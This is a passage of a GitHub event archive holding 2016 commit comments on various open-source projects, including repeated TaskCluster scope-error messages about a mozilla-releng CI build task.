\"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"e1709c4adee67189246467e7e2c02f9bba8b99fa\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:36:13.587Z\",\n                    \"deadline\": \"2016-09-24T12:36:13.587Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"ehR-C2bOT8C9yukWOo_eAA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:36:13.587Z\"\n                },\n                \"time\": \"2016-09-23T12:36:13.715Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"NlX9B0AjTCqACpYvPE8FvA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.587Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.587Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.587Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.726Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"NlX9B0AjTCqACpYvPE8FvA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.587Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.587Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.587Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.726Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"NlX9B0AjTCqACpYvPE8FvA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"e1709c4adee67189246467e7e2c02f9bba8b99fa\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:36:13.587Z\",\n                    \"deadline\": \"2016-09-24T12:36:13.587Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"ehR-C2bOT8C9yukWOo_eAA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:36:13.587Z\"\n                },\n                \"time\": \"2016-09-23T12:36:13.726Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T12:36:13Z"}
{"id":"4608294962","type":"CommitCommentEvent","actor":{"login":"roman-neuhauser"},"repo":{"name":"openSUSE/repose"},"payload":{"comment":{"id":19145504,"position":null,"line":null,"path":null,"commit_id":"5341f114125494c90a80294c4ee7c564b7c513fb","created_at":"2016-09-23T12:36:56Z","updated_at":"2016-09-23T12:36:56Z","body":"this breaks repose for people who test suse-cloud."}},"created_at":"2016-09-23T12:36:56Z"}
{"id":"4608295286","type":"CommitCommentEvent","actor":{"login":"jamesaoverton"},"repo":{"name":"ontodev/howl"},"payload":{"comment":{"id":19145507,"position":84,"line":114,"path":"src/howl/cli.clj","commit_id":"197fb7904a23adcc8db7e693065e11bf2532c2de","created_at":"2016-09-23T12:37:01Z","updated_at":"2016-09-23T12:37:01Z","body":"We'll still need to support NTriples, but it can wait a bit."}},"created_at":"2016-09-23T12:37:01Z"}
{"id":"4608296785","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"gregarndt/servo"},"payload":{"comment":{"id":19145510,"position":null,"line":null,"path":null,"commit_id":"7ee990c168daa5516629a8c753e8373240fa671b","created_at":"2016-09-23T12:37:23Z","updated_at":"2016-09-23T12:37:23Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dW63hwj0RhyeTLN4aG2XQA"}},"created_at":"2016-09-23T12:37:23Z"}
{"id":"4608296890","type":"CommitCommentEvent","actor":{"login":"nielsvm"},"repo":{"name":"RudivanHemert/CV"},"payload":{"comment":{"id":19145511,"position":63,"line":15,"path":"index.html","commit_id":"b34937a644f2f91a22e25f77fe817ecaa9dd402e","created_at":"2016-09-23T12:37:25Z","updated_at":"2016-09-23T12:37:25Z","body":"knipsel.png staat niet in GIT."}},"created_at":"2016-09-23T12:37:25Z"}
{"id":"4608298079","type":"CommitCommentEvent","actor":{"login":"dr-hannibal"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19145513,"position":21,"line":55,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-23T12:37:40Z","updated_at":"2016-09-23T12:37:40Z","body":"I have tried to figure out how to place all these `cfi` pseudo ops by example. So I wrote a function and generated an assembler listing. As I see it is necessary to provide information only about `fp`, `sp` and `blink`. Isn't it?\r\n\r\n```\r\nfoo:\r\n.LFB1:\r\n.LM4:\r\n\t.cfi_startproc\r\n\tpush_s blink\r\n\t.cfi_def_cfa_offset 4\r\n\t.cfi_offset 31, -4\r\n\tst.a fp,[sp,-4]\t;26\r\n\t.cfi_def_cfa_offset 8\r\n\t.cfi_offset 27, -8\r\n\tmov fp,sp\t;3\r\n\t.cfi_def_cfa_register 27\r\n\tsub_s sp,sp,108\r\n\tst r0,[fp,-100]\t;26\r\n\tst r1,[fp,-104]\t;26\r\n\tst r2,[fp,-108]\t;26\r\n.LM5:\r\n\tmov r2,0\t;3\r\n\tst r2,[fp,-4]\t;26\r\n.LBB2:\r\n.LM6:\r\n\tmov r2,0\t;3\r\n\tst r2,[fp,-8]\t;26\r\n\tb_s @.L4\r\n\t.align 4\r\n.L5:\r\n.LM7:\r\n\tld r3,[fp,-4]\t;23\r\n\tld r2,[fp,-8]\t;23\r\n\tadd_s r2,r2,r3\r\n\tst r2,[fp,-4]\t;26\r\n.LM8:\r\n\tld r2,[fp,-8]\t;23\r\n\tadd_s r2,r2,1\r\n\tst r2,[fp,-8]\t;26\r\n\t.align 2\r\n.L4:\r\n.LM9:\r\n\tld r3,[fp,-8]\t;23\r\n\tld r2,[fp,-100]\t;23\r\n\tcmp_s r3,r2\r\n\tblt_s @.L5\r\n.LBE2:\r\n.LM10:\r\n\tsub3 r3,fp,12\r\n\tmov r2,80\t;3\r\n\tmov r1,0\t;3\r\n\tmov r0,r3\t;3\r\n\tbl @memset;1\r\n.LBB3:\r\n.LM11:\r\n\tmov r2,0\t;3\r\n\tst r2,[fp,-12]\t;26\r\n\tb_s @.L6\r\n\t.align 4\r\n.L7:\r\n.LM12:\r\n\tld r2,[fp,-12]\t;23\r\n\tasl_s r2,r2,2\r\n\tadd_s r2,r2,fp\r\n\tld r3,[fp,-12]\t;23\r\n\tst r3,[r2,-96]\t;26\r\n.LM13:\r\n\tld r2,[fp,-12]\t;23\r\n\tadd_s r2,r2,1\r\n\tst r2,[fp,-12]\t;26\r\n\t.align 2\r\n.L6:\r\n.LM14:\r\n\tld r2,[fp,-12]\t;23\r\n\tcmp_s r2,19\r\n\tble_s @.L7\r\n.LBE3:\r\n.LM15:\r\n\tld r0,[fp,-4]\t;23\r\n\tbl @goo;1\r\n\tst r0,[fp,-16]\t;26\r\n.LM16:\r\n\tld r2,[fp,-16]\t;23\r\n.LM17:\r\n\tmov r0,r2\t;3\r\n\tmov sp,fp\t;3\r\n\t.cfi_def_cfa_register 28\r\n\tld.ab fp,[sp,4]\t;23\r\n\t.cfi_restore 27\r\n\t.cfi_def_cfa_offset 4\r\n\tpop_s blink\r\n\t.cfi_restore 31\r\n\t.cfi_def_cfa_offset 0\r\n\tj_s [blink]\r\n\t.cfi_endproc\r\n.LFE1:\r\n\t.size\tfoo, .-foo\r\n```"}},"created_at":"2016-09-23T12:37:40Z"}
{"id":"4608303954","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":19145525,"position":42,"line":101,"path":"package/MDAnalysis/topology/GROParser.py","commit_id":"1524f75248e30afcc9b3d8ff9d99555bffb9bf18","created_at":"2016-09-23T12:39:02Z","updated_at":"2016-09-23T12:39:02Z","body":"I'd rather each Parser do this individually based on the attributes that they have.  Eg here GRO guesses off the types, maybe another format guesses based upon something entirely different?\r\n\r\nIn general I think Parsers are too chaotic to generalise the guessers to work outside of the formats.\r\n\r\nWe could definitely add some checks somewhere to make sure that each Parser is supplying a set of compulsory attributes."}},"created_at":"2016-09-23T12:39:02Z"}
{"id":"4608305683","type":"CommitCommentEvent","actor":{"login":"mimi1vx"},"repo":{"name":"openSUSE/repose"},"payload":{"comment":{"id":19145533,"position":null,"line":null,"path":null,"commit_id":"5341f114125494c90a80294c4ee7c564b7c513fb","created_at":"2016-09-23T12:39:25Z","updated_at":"2016-09-23T12:39:25Z","body":"yes and no ... \r\npeople who tests CLOUD use repositories only from crowbar and manually adds only ISSUE REPO"}},"created_at":"2016-09-23T12:39:25Z"}
{"id":"4608312919","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19145572,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T12:41:02Z","updated_at":"2016-09-23T12:41:02Z","body":"Confirmed that `analysis-development` branch correctly notices that the `eax` is trashed after the call to `sum`. However, it's not ready for consumption yet. I will create a branch `indirect-calls` where I will put my proposal for a solution."}},"created_at":"2016-09-23T12:41:02Z"}
{"id":"4608312985","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19145573,"position":6,"line":21,"path":"libselinux/src/callbacks.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T12:41:03Z","updated_at":"2016-09-23T12:41:03Z","body":"Frankly, it seems wrong that we are doing this (silencing logging if SELinux disabled) in libselinux at all.  Came from Red Hat.  Would be curious to see what happens if we just drop it.  But regardless, #ifndef HOST is too general IMHO to be used upstream; we need a more specific/unique symbol."}},"created_at":"2016-09-23T12:41:03Z"}
{"id":"4608313289","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19145574,"position":6,"line":115,"path":"src/Images/wwwroot/Images/elements/so-juicy-filedrop/juicy-filedrop.html","commit_id":"bdc2dc74304c607f1037320ea5a3bdf0b6ec27da","created_at":"2016-09-23T12:41:08Z","updated_at":"2016-09-23T12:41:08Z","body":"Yeah you're right"}},"created_at":"2016-09-23T12:41:08Z"}
{"id":"4608315553","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19145580,"position":25,"line":41,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T12:41:38Z","updated_at":"2016-09-23T12:41:38Z","body":"Yes, that would be nicer."}},"created_at":"2016-09-23T12:41:38Z"}
{"id":"4608318180","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19145585,"position":47,"line":96,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T12:42:15Z","updated_at":"2016-09-23T12:42:15Z","body":"Is this truly the only occurrence?  I'd put this in selinux_internal.h or similar header for generality, or if there is only one user, then just switch it to fgets() and forget about it."}},"created_at":"2016-09-23T12:42:15Z"}
{"id":"4608318382","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19145586,"position":9,"line":13,"path":"src/Images/ViewModels/ConceptIllustrationPage.json.cs","commit_id":"41e27303f248bb780181971ce401d7613db2a375","created_at":"2016-09-23T12:42:18Z","updated_at":"2016-09-23T12:42:18Z","body":"Sorry my mistake"}},"created_at":"2016-09-23T12:42:18Z"}
{"id":"4608321468","type":"CommitCommentEvent","actor":{"login":"quilloss"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":19145597,"position":null,"line":null,"path":null,"commit_id":"efbfc00741d36e9de8b724e615c5b723bcf28f20","created_at":"2016-09-23T12:43:01Z","updated_at":"2016-09-23T12:43:01Z","body":"Compilation warning\r\n```\r\n../player/command.c: In function 'mp_on_set_option':\r\n../player/command.c:5638:5: warning: 'name' may be used uninitialized in this function [-Wmaybe-uninitialized]\r\n     mp_client_property_change(mpctx, property);\r\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n../player/command.c:299:17: note: 'name' was declared here\r\n     const char *name = co->name;\r\n                 ^~~~\r\n```"}},"created_at":"2016-09-23T12:43:01Z"}
{"id":"4608322052","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145601,"position":null,"line":null,"path":null,"commit_id":"a7016978f34653c5563249044147f5ecd3d0a2d2","created_at":"2016-09-23T12:43:08Z","updated_at":"2016-09-23T12:43:08Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35978/testReport/) for this commit**"}},"created_at":"2016-09-23T12:43:08Z"}
{"id":"4608322775","type":"CommitCommentEvent","actor":{"login":"pw94"},"repo":{"name":"bartoszkp/TDDEvaluation"},"payload":{"comment":{"id":19145602,"position":5,"line":44,"path":"SignalsIntegrationTests/SignalsIntegrationTests/SignalsIntegrationTests.csproj","commit_id":"2c5177f191a14b1e8a06d450bd7623599a4c892c","created_at":"2016-09-23T12:43:18Z","updated_at":"2016-09-23T12:43:18Z","body":"_It might be incorrect path_"}},"created_at":"2016-09-23T12:43:18Z"}
{"id":"4608327346","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19145611,"position":12,"line":565,"path":"libselinux/src/label_file.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T12:44:19Z","updated_at":"2016-09-23T12:44:19Z","body":"This stuff should be generalized to derive these paths from SELABEL_OPT_PATH.  More stuff that came from Red Hat."}},"created_at":"2016-09-23T12:44:19Z"}
{"id":"4608329227","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19145617,"position":5,"line":65,"path":"src/Images/wwwroot/Images/elements/so-juicy-filedrop/juicy-filedrop.html","commit_id":"8bb9dc7917a9040124be695ee57663f54230dbc7","created_at":"2016-09-23T12:44:45Z","updated_at":"2016-09-23T12:44:45Z","body":"The reason is that that custom element could be used both in mobile and on pc (pc is by default). So ismobile is used below - it's only for view (remove file drop, on moble there are no possibility to dorp file)"}},"created_at":"2016-09-23T12:44:45Z"}
{"id":"4608330286","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145623,"position":null,"line":null,"path":null,"commit_id":"2149d5ac7a1dc167892552ade57e1e8bec490f1c","created_at":"2016-09-23T12:45:00Z","updated_at":"2016-09-23T12:45:00Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 